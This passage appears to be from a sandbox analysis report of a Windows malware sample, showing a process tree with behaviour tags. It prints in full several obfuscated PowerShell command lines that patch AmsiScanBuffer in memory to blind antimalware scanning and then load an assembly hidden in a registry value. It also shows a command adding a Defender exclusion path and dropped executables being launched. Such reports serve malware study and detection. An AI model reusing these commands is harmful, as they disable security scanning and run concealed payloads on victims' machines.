$NFToseNOaRH.CreateType();}$rtReJDWFVnhTo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'icr'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+'t'+''+'.'+'W'+[Char](105)+'n3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$LYfWZsOPWzkTxi=$rtReJDWFVnhTo.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BpFUUUXdxCEPgAdZKUs=JXrFIEVYjveE @([String])([IntPtr]);$UODBKEHtycCZotFSmYXDgk=JXrFIEVYjveE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lHkfbTREXrj=$rtReJDWFVnhTo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$iaQMtqsHcUSftb=$LYfWZsOPWzkTxi.Invoke($Null,@([Object]$lHkfbTREXrj,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$odxuWGyCzeaXjghOj=$LYfWZsOPWzkTxi.Invoke($Null,@([Object]$lHkfbTREXrj,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$acsGANH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iaQMtqsHcUSftb,$BpFUUUXdxCEPgAdZKUs).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$SZWIqyBoSygYHHjGu=$LYfWZsOPWzkTxi.Invoke($Null,@([Object]$acsGANH,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$IBikMLEhey=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($odxuWGyCzeaXjghOj,$UODBKEHtycCZotFSmYXDgk).Invoke($SZWIqyBoSygYHHjGu,[uint32]8,4,[ref]$IBikMLEhey);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SZWIqyBoSygYHHjGu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($odxuWGyCzeaXjghOj,$UODBKEHtycCZotFSmYXDgk).Invoke($SZWIqyBoSygYHHjGu,[uint32]8,0x20,[ref]$IBikMLEhey);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+'7'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                  2⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious use of SetThreadContext
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4916
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    3⤵
                                                      PID:3320
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DIaXiTDULkVB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wdRyNGPUAwYTnf,[Parameter(Position=1)][Type]$CrShgGGkKu)$dWUnWGxnoYE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'leg'+[Char](97)+'te'+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+'bl'+'i'+'c,'+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+',A'+[Char](117)+''+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$dWUnWGxnoYE.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wdRyNGPUAwYTnf).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$dWUnWGxnoYE.DefineMethod(''+'I'+''+[Char](110)+'vo'+'k'+'e','P'+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+''+'t'+''+','+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$CrShgGGkKu,$wdRyNGPUAwYTnf).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+'Ma'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $dWUnWGxnoYE.CreateType();}$QnPKVHlkTXPUx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.W'+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+'o'+''+'d'+''+[Char](115)+'');$ORhrebLIXWGXKB=$QnPKVHlkTXPUx.GetMethod('G'+'e'+''+'t'+''+[Char](80)+''+'r'+'ocAd'+[Char](100)+'r'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iRPypuuUuuydTFGLyii=DIaXiTDULkVB @([String])([IntPtr]);$vRDiSmwiHAHUxmqbXeoTxp=DIaXiTDULkVB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yegubNlwooW=$QnPKVHlkTXPUx.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'Han'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+'2.'+'d'+''+[Char](108)+''+[Char](108)+'')));$BcSrLBeVENPOvg=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$yegubNlwooW,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'Li'+'b'+''+'r'+''+[Char](97)+'r'+'y'+'A')));$PVsyJQKlgFkURgMmN=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$yegubNlwooW,[Object](''+[Char](86)+'i'+[Char](114)+'tua'+[Char](108)+''+'P'+'ro'+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$uOqszWu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BcSrLBeVENPOvg,$iRPypuuUuuydTFGLyii).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$iVtBuQFdZloXdavLc=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$uOqszWu,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$DtTbxpEuyT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVsyJQKlgFkURgMmN,$vRDiSmwiHAHUxmqbXeoTxp).Invoke($iVtBuQFdZloXdavLc,[uint32]8,4,[ref]$DtTbxpEuyT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iVtBuQFdZloXdavLc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVsyJQKlgFkURgMmN,$vRDiSmwiHAHUxmqbXeoTxp).Invoke($iVtBuQFdZloXdavLc,[uint32]8,0x20,[ref]$DtTbxpEuyT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                    2⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2416
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      3⤵
                                                        PID:2108
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tviXYlZzDvXC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uPUWJpKtqgrJwM,[Parameter(Position=1)][Type]$nMbWSyHtGD)$tpNRHGfaxUj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+'l'+'e'+'g'+'a'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+'A'+''+'n'+''+'s'+'iC'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$tpNRHGfaxUj.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uPUWJpKtqgrJwM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$tpNRHGfaxUj.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Sig,N'+'e'+'wS'+'l'+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+'t'+'u'+'a'+[Char](108)+'',$nMbWSyHtGD,$uPUWJpKtqgrJwM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $tpNRHGfaxUj.CreateType();}$sWlSaAwdUfNaR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+'o'+'f'+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+'t'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$QaAaqNDqskrFcf=$sWlSaAwdUfNaR.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bl'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$feCOGfSxYwsuEUqFoQZ=tviXYlZzDvXC @([String])([IntPtr]);$BLOaJxVqqBHkofmqbWGzDq=tviXYlZzDvXC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mGFrbRmQPCU=$sWlSaAwdUfNaR.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rnel'+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$EUPwpfZsjCkVsu=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$mGFrbRmQPCU,[Object](''+[Char](76)+''+[Char](111)+'adL'+'i'+''+[Char](98)+''+'r'+''+'a'+'ryA')));$ETwJpAeliMMaAlPth=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$mGFrbRmQPCU,[Object]('Vi'+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$JZXRGsM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EUPwpfZsjCkVsu,$feCOGfSxYwsuEUqFoQZ).Invoke('am'+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'ll');$CjVgqxPmWISZegJIq=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$JZXRGsM,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+'S'+''+[Char](99)+''+'a'+''+'n'+''+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$gYDfvJIgzl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETwJpAeliMMaAlPth,$BLOaJxVqqBHkofmqbWGzDq).Invoke($CjVgqxPmWISZegJIq,[uint32]8,4,[ref]$gYDfvJIgzl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CjVgqxPmWISZegJIq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETwJpAeliMMaAlPth,$BLOaJxVqqBHkofmqbWGzDq).Invoke($CjVgqxPmWISZegJIq,[uint32]8,0x20,[ref]$gYDfvJIgzl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                      2⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious use of SetThreadContext
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3176
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        3⤵
                                                          PID:4980
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      1⤵
                                                      • Indicator Removal: Clear Windows Event Logs
                                                      PID:1204
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1296
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                        1⤵
                                                          PID:1308
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                          1⤵
                                                            PID:1384
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                            1⤵
                                                              PID:1448
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                              1⤵
                                                                PID:1460
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1476
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                  1⤵
                                                                    PID:1584
                                                                    • C:\Windows\system32\sihost.exe
                                                                      sihost.exe
                                                                      2⤵
                                                                        PID:2996
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                      1⤵
                                                                        PID:1636
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                        1⤵
                                                                          PID:1688
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                          1⤵
                                                                            PID:1724
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1816
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                              1⤵
                                                                                PID:1852
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                1⤵
                                                                                  PID:1884
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                  1⤵
                                                                                    PID:1900
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                    1⤵
                                                                                      PID:1960
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                      1⤵
                                                                                        PID:1980
                                                                                      • C:\Windows\System32\spoolsv.exe
                                                                                        C:\Windows\System32\spoolsv.exe
                                                                                        1⤵
                                                                                          PID:1004
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                          1⤵
                                                                                            PID:2060
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2276
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                              1⤵
                                                                                                PID:2284
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                1⤵
                                                                                                  PID:2296
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2448
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                  1⤵
                                                                                                    PID:2484
                                                                                                  • C:\Windows\sysmon.exe
                                                                                                    C:\Windows\sysmon.exe
                                                                                                    1⤵
                                                                                                      PID:2512
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                      1⤵
                                                                                                        PID:2584
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                        1⤵
                                                                                                          PID:2596
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                          1⤵
                                                                                                            PID:2604
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                            1⤵
                                                                                                              PID:2104
                                                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2184
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                                1⤵
                                                                                                                  PID:3096
                                                                                                                • C:\Windows\Explorer.EXE
                                                                                                                  C:\Windows\Explorer.EXE
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                                  PID:3420
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe"
                                                                                                                    2⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1200
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      3⤵
                                                                                                                        PID:4320
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:/windows/$77driver'"
                                                                                                                        3⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:868
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:/windows/$77driver'"
                                                                                                                          4⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3476
                                                                                                                      • C:\windows\$77driver\$77tor.exe
                                                                                                                        C:/windows/$77driver\$77tor.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2316
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          4⤵
                                                                                                                            PID:3156
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3140
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1036
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2216
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2204
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4628
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:532
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2224
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4460
                                                                                                                        • C:\windows\$77driver\$77install.exe
                                                                                                                          C:/windows/$77driver\$77install.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
